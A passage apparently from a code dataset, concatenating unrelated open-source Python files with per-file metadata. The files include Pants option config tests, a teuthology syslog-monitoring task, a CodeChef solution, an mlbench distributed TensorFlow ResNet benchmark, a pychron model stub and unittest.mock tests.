"list6": ["+[77, 88]"],
},
}
def test_default_values(self) -> None:
# This is used in `options_bootstrapper.py` to ignore default values when validating options.
file1_values = self.config.values[0]
file2_values = self.config.values[1]
# NB: string interpolation should only happen when calling _ConfigValues.get_value(). The
# values for _ConfigValues.defaults are not yet interpolated.
default_file1_values_unexpanded = {
**FILE_1.default_values,
"name": "%(env.NAME)s",
"path": "/a/b/%(answer)s",
"embed": "%(path)s::%(name)s",
}
assert file1_values.defaults == {
**self.default_seed_values,
**default_file1_values_unexpanded,
}
assert file2_values.defaults == self.default_seed_values
def test_get(self) -> None:
# Check the DEFAULT section
# N.B.: All values read from config files are read as str and only later converted by the
# options parser to the expected destination type; so we ensure we're comparing strings
# here.
for option, value in self.default_seed_values.items():
# Both config files have the seed values.
assert self.config.get(section="DEFAULT", option=option) == [str(value), str(value)]
for option, value in FILE_1.default_values.items():
# Only FILE_1 has explicit DEFAULT values.
assert self.config.get(section="DEFAULT", option=option) == [str(value)]
# Check the combined values.
for section, section_values in self.expected_combined_values.items():
for option, value_list in section_values.items():
assert self.config.get(section=section, option=option) == value_list
def test_empty(self) -> None:
config = Config.load([])
assert config.sources() == []
def test_toml_serializer() -> None:
original_values: Dict = {
"GLOBAL": {
"truthy": True,
"falsy": False,
"int": 0,
"float": 0.0,
"word": "hello there",
"listy": ["a", "b", "c"],
"map": {"a": 0, "b": 1},
},
"some-subsystem": {"o": ""},
}
assert TomlSerializer(original_values).normalize() == {
"GLOBAL": {**original_values["GLOBAL"], "map": "{'a': 0, 'b': 1}"},
"some-subsystem": {"o": ""},
}
def test_toml_serializer_list_add_remove() -> None:
original_values = {"GLOBAL": {"backend_packages.add": ["added"]}}
assert TomlSerializer(original_values).normalize() == { # type: ignore[arg-type]
"GLOBAL": {"backend_packages": "+['added']"}
}
| src/python/pants/option/config_test.py | 7,911 | Copyright 2015 Pants project contributors (see CONTRIBUTORS.md). Licensed under the Apache License, Version 2.0 (see LICENSE). This is used in `options_bootstrapper.py` to ignore default values when validating options. NB: string interpolation should only happen when calling _ConfigValues.get_value(). The values for _ConfigValues.defaults are not yet interpolated. Check the DEFAULT section N.B.: All values read from config files are read as str and only later converted by the options parser to the expected destination type; so we ensure we're comparing strings here. Both config files have the seed values. Only FILE_1 has explicit DEFAULT values. Check the combined values. type: ignore[arg-type] | 703 | en | 0.61469 |
import contextlib
import logging
from cStringIO import StringIO
from teuthology import misc
from teuthology.job_status import set_status
from teuthology.orchestra import run
log = logging.getLogger(__name__)
@contextlib.contextmanager
def syslog(ctx, config):
"""
start syslog / stop syslog on exit.
"""
if ctx.archive is None:
# disable this whole feature if we're not going to archive the data
# anyway
yield
return
log.info('Starting syslog monitoring...')
archive_dir = misc.get_archive_dir(ctx)
log_dir = '{adir}/syslog'.format(adir=archive_dir)
run.wait(
ctx.cluster.run(
args=['mkdir', '-p', '-m0755', '--', log_dir],
wait=False,
)
)
CONF = '/etc/rsyslog.d/80-cephtest.conf'
kern_log = '{log_dir}/kern.log'.format(log_dir=log_dir)
misc_log = '{log_dir}/misc.log'.format(log_dir=log_dir)
conf_lines = [
'kern.* -{kern_log};RSYSLOG_FileFormat'.format(kern_log=kern_log),
'*.*;kern.none -{misc_log};RSYSLOG_FileFormat'.format(
misc_log=misc_log),
]
conf_fp = StringIO('\n'.join(conf_lines))
try:
for rem in ctx.cluster.remotes.iterkeys():
log_context = 'system_u:object_r:var_log_t:s0'
for log_path in (kern_log, misc_log):
rem.run(args='touch %s' % log_path)
rem.chcon(log_path, log_context)
misc.sudo_write_file(
remote=rem,
path=CONF,
data=conf_fp,
)
conf_fp.seek(0)
run.wait(
ctx.cluster.run(
args=[
'sudo',
'service',
# a mere reload (SIGHUP) doesn't seem to make
# rsyslog open the files
'rsyslog',
'restart',
],
wait=False,
),
)
yield
finally:
log.info('Shutting down syslog monitoring...')
run.wait(
ctx.cluster.run(
args=[
'sudo',
'rm',
'-f',
'--',
CONF,
run.Raw('&&'),
'sudo',
'service',
'rsyslog',
'restart',
],
wait=False,
),
)
# race condition: nothing actually says rsyslog had time to
# flush the file fully. oh well.
log.info('Checking logs for errors...')
for rem in ctx.cluster.remotes.iterkeys():
log.debug('Checking %s', rem.name)
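            # The pipeline below greps the archived syslogs for kernel
            # BUG/INFO/DEADLOCK markers, filters out known-benign messages,
            # and keeps only the first remaining hit.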
r = rem.run(
args=[
'egrep', '--binary-files=text',
'\\bBUG\\b|\\bINFO\\b|\\bDEADLOCK\\b',
run.Raw('{adir}/syslog/*.log'.format(adir=archive_dir)),
run.Raw('|'),
'grep', '-v', 'task .* blocked for more than .* seconds',
run.Raw('|'),
'grep', '-v', 'lockdep is turned off',
run.Raw('|'),
'grep', '-v', 'trying to register non-static key',
run.Raw('|'),
'grep', '-v', 'DEBUG: fsize', # xfs_fsr
run.Raw('|'),
'grep', '-v', 'CRON', # ignore cron noise
run.Raw('|'),
'grep', '-v', 'BUG: bad unlock balance detected', # #6097
run.Raw('|'),
'grep', '-v', 'inconsistent lock state', # FIXME see #2523
run.Raw('|'),
'grep', '-v', '*** DEADLOCK ***', # part of lockdep output
run.Raw('|'),
'grep', '-v',
# FIXME see #2590 and #147
'INFO: possible irq lock inversion dependency detected',
run.Raw('|'),
'grep', '-v',
'INFO: NMI handler (perf_event_nmi_handler) took too long to run', # noqa
run.Raw('|'),
'grep', '-v', 'INFO: recovery required on readonly',
run.Raw('|'),
'grep', '-v', 'ceph-create-keys: INFO',
run.Raw('|'),
'egrep', '-v', '\\bsalt-master\\b|\\bsalt-minion\\b|\\bsalt-api\\b',
run.Raw('|'),
'head', '-n', '1',
],
stdout=StringIO(),
)
stdout = r.stdout.getvalue()
if stdout != '':
log.error('Error in syslog on %s: %s', rem.name, stdout)
set_status(ctx.summary, 'fail')
if 'failure_reason' not in ctx.summary:
ctx.summary['failure_reason'] = \
"'{error}' in syslog".format(error=stdout)
log.info('Compressing syslogs...')
run.wait(
ctx.cluster.run(
args=[
'find',
'{adir}/syslog'.format(adir=archive_dir),
'-name',
'*.log',
'-print0',
run.Raw('|'),
'sudo',
'xargs',
'-0',
'--no-run-if-empty',
'--',
'gzip',
'--',
],
wait=False,
),
)
| teuthology/task/internal/syslog.py | 5,609 | start syslog / stop syslog on exit.
disable this whole feature if we're not going to archive the data anyway a mere reload (SIGHUP) doesn't seem to make rsyslog open the files race condition: nothing actually says rsyslog had time to flush the file fully. oh well. xfs_fsr ignore cron noise 6097 FIXME see 2523 part of lockdep output FIXME see 2590 and 147 noqa | 363 | en | 0.884214 |
#https://www.codechef.com/problems/DECINC
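# If N is divisible by 4, print N + 1; otherwise print N - 1.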
n = int(input())
if(n%4==0):
print(n+1)
else:
print(n-1) | CodeChef/DECINC_Decrement OR Increment.py | 106 | https://www.codechef.com/problems/DECINC | 40 | en | 0.34274 |
r"""Distributed TensorFlow with Monitored Training Session.
This implements the 1a image recognition benchmark task, see https://mlbench.readthedocs.io/en/latest/benchmark-tasks.html#a-image-classification-resnet-cifar-10
for more details
Adapted from official tutorial::
https://www.tensorflow.org/deploy/distributed
Launch::
mpirun -n 3 --allow-run-as-root python ....
"""
import argparse
import logging
import os
import tensorflow as tf
from mlbench_core.controlflow.tensorflow.train_validation import train_round, \
validation_round
from mlbench_core.dataset.imagerecognition.tensorflow.cifar10 import \
DatasetCifar
from mlbench_core.evaluation.goals import task1_time_to_accuracy_light_goal, \
task1_time_to_accuracy_goal
from mlbench_core.evaluation.tensorflow.criterion import \
softmax_cross_entropy_with_logits_v2_l2_regularized
from mlbench_core.evaluation.tensorflow.metrics import TopKAccuracy
from mlbench_core.lr_scheduler.tensorflow.lr import manual_stepping
from mlbench_core.models.tensorflow.resnet_model import Cifar10Model
from mlbench_core.utils import Tracker
def define_graph(inputs, labels, is_training, batch_size, replicas_to_aggregate):
"""
Define graph for synchronized training.
"""
model = Cifar10Model(
resnet_size=20,
data_format='channels_last',
resnet_version=2,
dtype=tf.float32)
logits = model(inputs, is_training)
loss = softmax_cross_entropy_with_logits_v2_l2_regularized(
logits=logits,
labels=labels,
l2=2e-4,
# Exclude BN weights from L2 regularizer
loss_filter_fn=lambda name: 'batch_normalization' not in name)
# Use Top K accuracy as metrics
metrics = [
TopKAccuracy(logits, labels, topk=1),
TopKAccuracy(logits, labels, topk=5),
]
global_step = tf.train.get_or_create_global_step()
# scheduling learning steps.
lr_scheduler = manual_stepping(
global_step=global_step,
boundaries=[32000 // replicas_to_aggregate,
48000 // replicas_to_aggregate],
rates=[0.1, 0.01, 0.001],
warmup=False)
# Define the optimizer
optimizer_ = tf.train.MomentumOptimizer(
learning_rate=lr_scheduler,
momentum=0.9,
use_nesterov=True)
# Wrap optimizer with `SyncReplicasOptimizer`
optimizer = tf.train.SyncReplicasOptimizer(
optimizer_,
replicas_to_aggregate=replicas_to_aggregate,
total_num_replicas=replicas_to_aggregate)
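    # NB: `rank` is not a parameter of define_graph(); it is resolved from the
    # module-level variable assigned in the __main__ block below.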
hooks = [
optimizer.make_session_run_hook((rank == 0), num_tokens=0)
]
# The update for batch normalization.
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
with tf.control_dependencies(update_ops):
# Not all of the processes contribute one update. Some faster procs can push more updates.
grads_and_vars = list(optimizer.compute_gradients(
loss, tf.trainable_variables()))
train_op = optimizer.apply_gradients(
grads_and_vars, global_step=global_step)
return train_op, loss, metrics, hooks
def main(is_ps, run_id, rank, world_size, cluster_spec, batch_size,
replicas_to_aggregate, light_target=False):
logging.info("Initial.")
job_name = "ps" if is_ps else "worker"
cluster = tf.train.ClusterSpec(cluster_spec)
gpu_options = tf.GPUOptions(allow_growth=True,
per_process_gpu_memory_fraction=0.2)
session_conf = tf.ConfigProto(
gpu_options=gpu_options,
allow_soft_placement=True,
log_device_placement=False)
server = tf.train.Server(
cluster, job_name=job_name, task_index=rank, config=session_conf)
if is_ps:
server.join()
else:
# Pin variables to parameter server.
device_fn = tf.train.replica_device_setter(
ps_tasks=None,
ps_device="/job:ps",
worker_device="/job:{}/task:{}/device:GPU:{}".format(
job_name, rank, rank),
merge_devices=True,
cluster=cluster,
ps_ops=None,
ps_strategy=None)
with tf.Graph().as_default():
with tf.device(device_fn):
data_loader = DatasetCifar(
dataset='cifar-10',
dataset_root='/datasets',
batch_size=batch_size,
world_size=world_size,
rank=rank,
seed=42,
tf_dtype=tf.float32)
train_op, loss, metrics, hooks = define_graph(
data_loader.inputs,
data_loader.labels,
data_loader.training,
batch_size,
replicas_to_aggregate)
local_init_op = tf.group(
tf.local_variables_initializer(),
data_loader.train_init_op,
data_loader.validation_init_op)
scaffold = tf.train.Scaffold(
init_op=None,
init_feed_dict=None,
init_fn=None,
ready_op=None,
ready_for_local_init_op=None,
local_init_op=local_init_op)
lr_tensor_name = tf.get_default_graph().get_tensor_by_name("learning_rate:0")
with tf.train.MonitoredTrainingSession(config=session_conf,
master=server.target,
scaffold=scaffold,
is_chief=(rank == 0),
checkpoint_dir=None,
save_checkpoint_secs=None,
save_summaries_steps=None,
stop_grace_period_secs=5,
hooks=hooks) as sess:
logging.info("Begin training.")
final_epoch = 164
if light_target:
goal = task1_time_to_accuracy_light_goal()
else:
goal = task1_time_to_accuracy_goal()
tracker = Tracker(metrics, run_id, rank, goal=goal)
tracker.start()
for i_epoch in range(final_epoch):
logging.debug("=> Epoch {}".format(i_epoch))
train_round(sess, data_loader.train_init_op, train_op,
loss, metrics, batch_size,
data_loader.num_batches_per_epoch_for_train,
tracker, lr_tensor=lr_tensor_name,
lr_scheduler_level='epoch')
validation_round(sess, data_loader.validation_init_op,
loss, metrics, batch_size,
data_loader.num_batches_per_epoch_for_eval,
tracker)
tracker.epoch_end()
if tracker.goal_reached:
print("Goal Reached!")
return
logging.info("Finish.")
def configure_logger(log_dir, is_ps, rank):
logger = logging.getLogger('')
logger.setLevel(logging.DEBUG)
formatter = logging.Formatter(
'{:6} rank={} : %(message)s'.format("ps" if is_ps else "worker", rank),
"%Y-%m-%d %H:%M:%S")
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
ch.setFormatter(formatter)
logger.addHandler(ch)
log_name = '{}-{}.log'.format("ps" if is_ps else "worker", rank)
log_name = os.path.join(log_dir, log_name)
if os.path.exists(log_name):
os.remove(log_name)
fh = logging.FileHandler(log_name)
fh.setLevel(logging.DEBUG)
fh.setFormatter(formatter)
logger.addHandler(fh)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Process run parameters')
parser.add_argument('--run_id', type=str, help='The id of the run')
parser.add_argument('--hosts', type=str, help='The hosts participating in this run')
parser.add_argument('--light', action='store_true', default=False,
help='Train to light target metric goal')
args = parser.parse_args()
rank = int(os.environ['OMPI_COMM_WORLD_RANK'])
size = int(os.environ['OMPI_COMM_WORLD_SIZE'])
hosts = args.hosts.split(",")
if len(hosts) < 2:
raise ValueError("At least 2 pods are needed for this benchmark (1 parameter server, 1 worker)")
workers = [h + ":22222" for h in hosts[1:]]
    ps = hosts[0] + ":22222"  # The first host acts as the parameter server
cluster_spec = {"worker": workers,
"ps": [ps]}
# Parse role in the cluster by rank.
is_ps = rank < len(cluster_spec['ps'])
rank = rank if is_ps else rank - len(cluster_spec['ps'])
world_size = size - len(cluster_spec['ps'])
# Configure Logging
if not os.path.exists('/mlbench'):
os.makedirs('/mlbench')
configure_logger('/mlbench', is_ps, rank)
batch_size = 128
replicas_to_aggregate = len(cluster_spec['worker'])
main(is_ps, args.run_id, rank, world_size, cluster_spec,
batch_size, replicas_to_aggregate, light_target=args.light)
| tensorflow/imagerecognition/openmpi-cifar10-resnet20-all-reduce/main.py | 9,469 | Define graph for synchronized training.
Distributed TensorFlow with Monitored Training Session.
This implements the 1a image recognition benchmark task, see https://mlbench.readthedocs.io/en/latest/benchmark-tasks.html#a-image-classification-resnet-cifar-10
for more details
Adapted from official tutorial::
https://www.tensorflow.org/deploy/distributed
Launch::
mpirun -n 3 --allow-run-as-root python ....
Exclude BN weights from L2 regularizer Use Top K accuracy as metrics scheduling learning steps. Define the optimizer Wrap optimizer with `SyncReplicasOptimizer` The update for batch normalization. Not all of the processes contribute one update. Some faster procs can push more updates. Pin variables to parameter server. First worker is the parameter server Parse role in the cluster by rank. Configure Logging | 832 | en | 0.730821 |
# ===============================================================================
# Copyright 2014 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# ============= enthought library imports =======================
from __future__ import absolute_import
from traits.api import List
# ============= standard library imports ========================
# ============= local library imports ==========================
from pychron.loggable import Loggable
class BaseTagModel(Loggable):
items = List
# ============= EOF =============================================
| pychron/pipeline/tagging/base_tags.py | 1,157 | =============================================================================== Copyright 2014 Jake Ross Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. =============================================================================== ============= enthought library imports ======================= ============= standard library imports ======================== ============= local library imports ========================== ============= EOF ============================================= | 960 | en | 0.713752 |
import time
import types
import unittest
from unittest.mock import (
call, _Call, create_autospec, MagicMock,
Mock, ANY, _CallList, patch, PropertyMock
)
from datetime import datetime
class SomeClass(object):
def one(self, a, b):
pass
def two(self):
pass
def three(self, a=None):
pass
class AnyTest(unittest.TestCase):
def test_any(self):
self.assertEqual(ANY, object())
mock = Mock()
mock(ANY)
mock.assert_called_with(ANY)
mock = Mock()
mock(foo=ANY)
mock.assert_called_with(foo=ANY)
def test_repr(self):
self.assertEqual(repr(ANY), '<ANY>')
self.assertEqual(str(ANY), '<ANY>')
def test_any_and_datetime(self):
mock = Mock()
mock(datetime.now(), foo=datetime.now())
mock.assert_called_with(ANY, foo=ANY)
def test_any_mock_calls_comparison_order(self):
mock = Mock()
d = datetime.now()
class Foo(object):
def __eq__(self, other):
return False
def __ne__(self, other):
return True
for d in datetime.now(), Foo():
mock.reset_mock()
mock(d, foo=d, bar=d)
mock.method(d, zinga=d, alpha=d)
mock().method(a1=d, z99=d)
expected = [
call(ANY, foo=ANY, bar=ANY),
call.method(ANY, zinga=ANY, alpha=ANY),
call(), call().method(a1=ANY, z99=ANY)
]
self.assertEqual(expected, mock.mock_calls)
self.assertEqual(mock.mock_calls, expected)
class CallTest(unittest.TestCase):
def test_call_with_call(self):
kall = _Call()
self.assertEqual(kall, _Call())
self.assertEqual(kall, _Call(('',)))
self.assertEqual(kall, _Call(((),)))
self.assertEqual(kall, _Call(({},)))
self.assertEqual(kall, _Call(('', ())))
self.assertEqual(kall, _Call(('', {})))
self.assertEqual(kall, _Call(('', (), {})))
self.assertEqual(kall, _Call(('foo',)))
self.assertEqual(kall, _Call(('bar', ())))
self.assertEqual(kall, _Call(('baz', {})))
self.assertEqual(kall, _Call(('spam', (), {})))
kall = _Call(((1, 2, 3),))
self.assertEqual(kall, _Call(((1, 2, 3),)))
self.assertEqual(kall, _Call(('', (1, 2, 3))))
self.assertEqual(kall, _Call(((1, 2, 3), {})))
self.assertEqual(kall, _Call(('', (1, 2, 3), {})))
kall = _Call(((1, 2, 4),))
self.assertNotEqual(kall, _Call(('', (1, 2, 3))))
self.assertNotEqual(kall, _Call(('', (1, 2, 3), {})))
kall = _Call(('foo', (1, 2, 4),))
self.assertNotEqual(kall, _Call(('', (1, 2, 4))))
self.assertNotEqual(kall, _Call(('', (1, 2, 4), {})))
self.assertNotEqual(kall, _Call(('bar', (1, 2, 4))))
self.assertNotEqual(kall, _Call(('bar', (1, 2, 4), {})))
kall = _Call(({'a': 3},))
self.assertEqual(kall, _Call(('', (), {'a': 3})))
self.assertEqual(kall, _Call(('', {'a': 3})))
self.assertEqual(kall, _Call(((), {'a': 3})))
self.assertEqual(kall, _Call(({'a': 3},)))
def test_empty__Call(self):
args = _Call()
self.assertEqual(args, ())
self.assertEqual(args, ('foo',))
self.assertEqual(args, ((),))
self.assertEqual(args, ('foo', ()))
self.assertEqual(args, ('foo',(), {}))
self.assertEqual(args, ('foo', {}))
self.assertEqual(args, ({},))
def test_named_empty_call(self):
args = _Call(('foo', (), {}))
self.assertEqual(args, ('foo',))
self.assertEqual(args, ('foo', ()))
self.assertEqual(args, ('foo',(), {}))
self.assertEqual(args, ('foo', {}))
self.assertNotEqual(args, ((),))
self.assertNotEqual(args, ())
self.assertNotEqual(args, ({},))
self.assertNotEqual(args, ('bar',))
self.assertNotEqual(args, ('bar', ()))
self.assertNotEqual(args, ('bar', {}))
def test_call_with_args(self):
args = _Call(((1, 2, 3), {}))
self.assertEqual(args, ((1, 2, 3),))
self.assertEqual(args, ('foo', (1, 2, 3)))
self.assertEqual(args, ('foo', (1, 2, 3), {}))
self.assertEqual(args, ((1, 2, 3), {}))
def test_named_call_with_args(self):
args = _Call(('foo', (1, 2, 3), {}))
self.assertEqual(args, ('foo', (1, 2, 3)))
self.assertEqual(args, ('foo', (1, 2, 3), {}))
self.assertNotEqual(args, ((1, 2, 3),))
self.assertNotEqual(args, ((1, 2, 3), {}))
def test_call_with_kwargs(self):
args = _Call(((), dict(a=3, b=4)))
self.assertEqual(args, (dict(a=3, b=4),))
self.assertEqual(args, ('foo', dict(a=3, b=4)))
self.assertEqual(args, ('foo', (), dict(a=3, b=4)))
self.assertEqual(args, ((), dict(a=3, b=4)))
def test_named_call_with_kwargs(self):
args = _Call(('foo', (), dict(a=3, b=4)))
self.assertEqual(args, ('foo', dict(a=3, b=4)))
self.assertEqual(args, ('foo', (), dict(a=3, b=4)))
self.assertNotEqual(args, (dict(a=3, b=4),))
self.assertNotEqual(args, ((), dict(a=3, b=4)))
def test_call_with_args_call_empty_name(self):
args = _Call(((1, 2, 3), {}))
self.assertEqual(args, call(1, 2, 3))
self.assertEqual(call(1, 2, 3), args)
self.assertIn(call(1, 2, 3), [args])
def test_call_ne(self):
self.assertNotEqual(_Call(((1, 2, 3),)), call(1, 2))
self.assertFalse(_Call(((1, 2, 3),)) != call(1, 2, 3))
self.assertTrue(_Call(((1, 2), {})) != call(1, 2, 3))
def test_call_non_tuples(self):
kall = _Call(((1, 2, 3),))
for value in 1, None, self, int:
self.assertNotEqual(kall, value)
self.assertFalse(kall == value)
def test_repr(self):
self.assertEqual(repr(_Call()), 'call()')
self.assertEqual(repr(_Call(('foo',))), 'call.foo()')
self.assertEqual(repr(_Call(((1, 2, 3), {'a': 'b'}))),
"call(1, 2, 3, a='b')")
self.assertEqual(repr(_Call(('bar', (1, 2, 3), {'a': 'b'}))),
"call.bar(1, 2, 3, a='b')")
self.assertEqual(repr(call), 'call')
self.assertEqual(str(call), 'call')
self.assertEqual(repr(call()), 'call()')
self.assertEqual(repr(call(1)), 'call(1)')
self.assertEqual(repr(call(zz='thing')), "call(zz='thing')")
self.assertEqual(repr(call().foo), 'call().foo')
self.assertEqual(repr(call(1).foo.bar(a=3).bing),
'call().foo.bar().bing')
self.assertEqual(
repr(call().foo(1, 2, a=3)),
"call().foo(1, 2, a=3)"
)
self.assertEqual(repr(call()()), "call()()")
self.assertEqual(repr(call(1)(2)), "call()(2)")
self.assertEqual(
repr(call()().bar().baz.beep(1)),
"call()().bar().baz.beep(1)"
)
def test_call(self):
self.assertEqual(call(), ('', (), {}))
self.assertEqual(call('foo', 'bar', one=3, two=4),
('', ('foo', 'bar'), {'one': 3, 'two': 4}))
mock = Mock()
mock(1, 2, 3)
mock(a=3, b=6)
self.assertEqual(mock.call_args_list,
[call(1, 2, 3), call(a=3, b=6)])
def test_attribute_call(self):
self.assertEqual(call.foo(1), ('foo', (1,), {}))
self.assertEqual(call.bar.baz(fish='eggs'),
('bar.baz', (), {'fish': 'eggs'}))
mock = Mock()
        mock.foo(1, 2, 3)
mock.bar.baz(a=3, b=6)
self.assertEqual(mock.method_calls,
[call.foo(1, 2, 3), call.bar.baz(a=3, b=6)])
def test_extended_call(self):
result = call(1).foo(2).bar(3, a=4)
self.assertEqual(result, ('().foo().bar', (3,), dict(a=4)))
mock = MagicMock()
mock(1, 2, a=3, b=4)
self.assertEqual(mock.call_args, call(1, 2, a=3, b=4))
self.assertNotEqual(mock.call_args, call(1, 2, 3))
self.assertEqual(mock.call_args_list, [call(1, 2, a=3, b=4)])
self.assertEqual(mock.mock_calls, [call(1, 2, a=3, b=4)])
mock = MagicMock()
mock.foo(1).bar()().baz.beep(a=6)
last_call = call.foo(1).bar()().baz.beep(a=6)
self.assertEqual(mock.mock_calls[-1], last_call)
self.assertEqual(mock.mock_calls, last_call.call_list())
def test_call_list(self):
mock = MagicMock()
mock(1)
self.assertEqual(call(1).call_list(), mock.mock_calls)
mock = MagicMock()
mock(1).method(2)
self.assertEqual(call(1).method(2).call_list(),
mock.mock_calls)
mock = MagicMock()
mock(1).method(2)(3)
self.assertEqual(call(1).method(2)(3).call_list(),
mock.mock_calls)
mock = MagicMock()
int(mock(1).method(2)(3).foo.bar.baz(4)(5))
kall = call(1).method(2)(3).foo.bar.baz(4)(5).__int__()
self.assertEqual(kall.call_list(), mock.mock_calls)
def test_call_any(self):
self.assertEqual(call, ANY)
m = MagicMock()
int(m)
self.assertEqual(m.mock_calls, [ANY])
self.assertEqual([ANY], m.mock_calls)
def test_two_args_call(self):
args = _Call(((1, 2), {'a': 3}), two=True)
self.assertEqual(len(args), 2)
self.assertEqual(args[0], (1, 2))
self.assertEqual(args[1], {'a': 3})
other_args = _Call(((1, 2), {'a': 3}))
self.assertEqual(args, other_args)
def test_call_with_name(self):
self.assertEqual(_Call((), 'foo')[0], 'foo')
self.assertEqual(_Call((('bar', 'barz'),),)[0], '')
self.assertEqual(_Call((('bar', 'barz'), {'hello': 'world'}),)[0], '')
class SpecSignatureTest(unittest.TestCase):
def _check_someclass_mock(self, mock):
self.assertRaises(AttributeError, getattr, mock, 'foo')
mock.one(1, 2)
mock.one.assert_called_with(1, 2)
self.assertRaises(AssertionError,
mock.one.assert_called_with, 3, 4)
self.assertRaises(TypeError, mock.one, 1)
mock.two()
mock.two.assert_called_with()
self.assertRaises(AssertionError,
mock.two.assert_called_with, 3)
self.assertRaises(TypeError, mock.two, 1)
mock.three()
mock.three.assert_called_with()
self.assertRaises(AssertionError,
mock.three.assert_called_with, 3)
self.assertRaises(TypeError, mock.three, 3, 2)
mock.three(1)
mock.three.assert_called_with(1)
mock.three(a=1)
mock.three.assert_called_with(a=1)
def test_basic(self):
mock = create_autospec(SomeClass)
self._check_someclass_mock(mock)
mock = create_autospec(SomeClass())
self._check_someclass_mock(mock)
def test_create_autospec_return_value(self):
def f():
pass
mock = create_autospec(f, return_value='foo')
self.assertEqual(mock(), 'foo')
class Foo(object):
pass
mock = create_autospec(Foo, return_value='foo')
self.assertEqual(mock(), 'foo')
def test_autospec_reset_mock(self):
m = create_autospec(int)
int(m)
m.reset_mock()
self.assertEqual(m.__int__.call_count, 0)
def test_mocking_unbound_methods(self):
class Foo(object):
def foo(self, foo):
pass
p = patch.object(Foo, 'foo')
mock_foo = p.start()
Foo().foo(1)
mock_foo.assert_called_with(1)
def test_create_autospec_unbound_methods(self):
# see mock issue 128
# this is expected to fail until the issue is fixed
return
class Foo(object):
def foo(self):
pass
klass = create_autospec(Foo)
instance = klass()
self.assertRaises(TypeError, instance.foo, 1)
# Note: no type checking on the "self" parameter
klass.foo(1)
klass.foo.assert_called_with(1)
self.assertRaises(TypeError, klass.foo)
def test_create_autospec_keyword_arguments(self):
class Foo(object):
a = 3
m = create_autospec(Foo, a='3')
self.assertEqual(m.a, '3')
def test_create_autospec_keyword_only_arguments(self):
def foo(a, *, b=None):
pass
m = create_autospec(foo)
m(1)
m.assert_called_with(1)
self.assertRaises(TypeError, m, 1, 2)
m(2, b=3)
m.assert_called_with(2, b=3)
def test_function_as_instance_attribute(self):
obj = SomeClass()
def f(a):
pass
obj.f = f
mock = create_autospec(obj)
mock.f('bing')
mock.f.assert_called_with('bing')
def test_spec_as_list(self):
# because spec as a list of strings in the mock constructor means
# something very different we treat a list instance as the type.
mock = create_autospec([])
mock.append('foo')
mock.append.assert_called_with('foo')
self.assertRaises(AttributeError, getattr, mock, 'foo')
class Foo(object):
foo = []
mock = create_autospec(Foo)
mock.foo.append(3)
mock.foo.append.assert_called_with(3)
self.assertRaises(AttributeError, getattr, mock.foo, 'foo')
def test_attributes(self):
class Sub(SomeClass):
attr = SomeClass()
sub_mock = create_autospec(Sub)
for mock in (sub_mock, sub_mock.attr):
self._check_someclass_mock(mock)
def test_builtin_functions_types(self):
# we could replace builtin functions / methods with a function
# with *args / **kwargs signature. Using the builtin method type
# as a spec seems to work fairly well though.
class BuiltinSubclass(list):
def bar(self, arg):
pass
sorted = sorted
attr = {}
mock = create_autospec(BuiltinSubclass)
mock.append(3)
mock.append.assert_called_with(3)
self.assertRaises(AttributeError, getattr, mock.append, 'foo')
mock.bar('foo')
mock.bar.assert_called_with('foo')
self.assertRaises(TypeError, mock.bar, 'foo', 'bar')
self.assertRaises(AttributeError, getattr, mock.bar, 'foo')
mock.sorted([1, 2])
mock.sorted.assert_called_with([1, 2])
self.assertRaises(AttributeError, getattr, mock.sorted, 'foo')
mock.attr.pop(3)
mock.attr.pop.assert_called_with(3)
self.assertRaises(AttributeError, getattr, mock.attr, 'foo')
def test_method_calls(self):
class Sub(SomeClass):
attr = SomeClass()
mock = create_autospec(Sub)
mock.one(1, 2)
mock.two()
mock.three(3)
expected = [call.one(1, 2), call.two(), call.three(3)]
self.assertEqual(mock.method_calls, expected)
mock.attr.one(1, 2)
mock.attr.two()
mock.attr.three(3)
expected.extend(
[call.attr.one(1, 2), call.attr.two(), call.attr.three(3)]
)
self.assertEqual(mock.method_calls, expected)
def test_magic_methods(self):
class BuiltinSubclass(list):
attr = {}
mock = create_autospec(BuiltinSubclass)
self.assertEqual(list(mock), [])
self.assertRaises(TypeError, int, mock)
self.assertRaises(TypeError, int, mock.attr)
self.assertEqual(list(mock), [])
self.assertIsInstance(mock['foo'], MagicMock)
self.assertIsInstance(mock.attr['foo'], MagicMock)
def test_spec_set(self):
class Sub(SomeClass):
attr = SomeClass()
for spec in (Sub, Sub()):
mock = create_autospec(spec, spec_set=True)
self._check_someclass_mock(mock)
self.assertRaises(AttributeError, setattr, mock, 'foo', 'bar')
self.assertRaises(AttributeError, setattr, mock.attr, 'foo', 'bar')
def test_descriptors(self):
class Foo(object):
@classmethod
def f(cls, a, b):
pass
@staticmethod
def g(a, b):
pass
class Bar(Foo):
pass
class Baz(SomeClass, Bar):
pass
for spec in (Foo, Foo(), Bar, Bar(), Baz, Baz()):
mock = create_autospec(spec)
mock.f(1, 2)
mock.f.assert_called_once_with(1, 2)
mock.g(3, 4)
mock.g.assert_called_once_with(3, 4)
def test_recursive(self):
class A(object):
def a(self):
pass
foo = 'foo bar baz'
bar = foo
A.B = A
mock = create_autospec(A)
mock()
self.assertFalse(mock.B.called)
mock.a()
mock.B.a()
self.assertEqual(mock.method_calls, [call.a(), call.B.a()])
self.assertIs(A.foo, A.bar)
self.assertIsNot(mock.foo, mock.bar)
mock.foo.lower()
self.assertRaises(AssertionError, mock.bar.lower.assert_called_with)
def test_spec_inheritance_for_classes(self):
class Foo(object):
def a(self, x):
pass
class Bar(object):
def f(self, y):
pass
class_mock = create_autospec(Foo)
self.assertIsNot(class_mock, class_mock())
for this_mock in class_mock, class_mock():
this_mock.a(x=5)
this_mock.a.assert_called_with(x=5)
